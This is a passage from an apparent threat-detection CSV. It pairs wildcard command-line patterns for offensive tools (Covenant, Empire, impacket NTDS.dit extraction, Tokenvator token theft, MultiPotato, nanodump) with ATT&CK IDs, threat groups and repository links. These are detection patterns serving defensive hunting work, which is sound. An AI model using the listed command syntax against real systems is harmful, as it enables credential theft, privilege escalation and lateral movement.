multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"* -stageless -Ix64 *.bin -Ix86 *.bin -P Inject -O *.js*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" +"* -stageless -Ix64 *.bin -Ix86 *.bin -P Inject -process64 *.exe -O *.js*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" +"* -stageless -Ix64 *.bin -Ix86 *.bin -P Inject -unhook -O *.js*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" +"* -stageless -Ix64 *.bin -Ix86 *.bin -P Local -O *.js*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" +"* -stageless -Ix64 *.bin -Ix86 *.bin -P Local -unhook -O *.js*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" +"* start covenant*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"* start_campaign.py*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","0","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"* start_hidden_process*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* StayKit.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","0","N/A","10","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"* steal_token /process:* /command:*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" +"* stop covenant*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"* striker.py*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"* stun-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* stun-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* stuxnet-detect.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* supermicro-ipmi-conf.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* Supershell.tar.gz*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"* -sV --script vulners *","offensive_tool_keyword","nmap","Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Network Exploitation tools","https://nmap.org/book/nse-usage.html","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* svn-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* SW2_HashSyscall*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"* SweetPotato by @_EthicalChaos*","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","0","N/A","10","10","236","49","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z" +"* --syscalls GetSyscallStub*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"* -syscalls -sleep=*.exe*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"* --syscalls SysWhispers3*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"* -system SYSTEM -ntds NTDS.dit LOCAL*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* -system SYSTEM -ntds NTDS.dit -outputfile*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* --syswhispers --jump*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"* SysWhispers*","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/InlineWhispers","1","0","N/A","10","10","286","42","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z" +"* -t *https://autodiscover.*/autodiscover/autodiscover.xml*autodiscover*","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","0","N/A","N/A","1","76","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" +"* -t 127.0.0.1 -p 1337 *","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","0","N/A","7","2","175","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z" +"* -t BindShell -p *pwned\pipe\spoolss*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" +"* -t C2concealer *","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","0","N/A","10","10","850","162","2021-09-26T16:37:06Z","2020-03-23T14:13:16Z" +"* -t CreateProcessAsUserW -p *pwned\pipe\spoolss* -e *.exe*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" +"* -t dcsync://* -*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* -t donut *","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"* -t pe2sh*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"* -t schtaskbackdoor *","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1151","233","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" +"* -Target * -AllDomain *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -Target * -InitialGrooms *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -Target * -Shellcode *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* --target=* --payload=*cmd.exe /c*","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for lateral movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","0","N/A","10","6","567","85","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z" +"* -target-domain * -outputfile * -no-pass*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* targetedKerberoast.py *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* --target-name * --domain * --dc-ip * --executable *.exe*","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","0","N/A","10","1","73","13","2023-05-21T15:00:07Z","2023-04-16T10:44:55Z" +"* targets-asn.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* targets-ipv6-map4to6.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* targets-ipv6-multicast-echo.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* targets-ipv6-multicast-invalid-dst.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* targets-ipv6-multicast-mld.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation 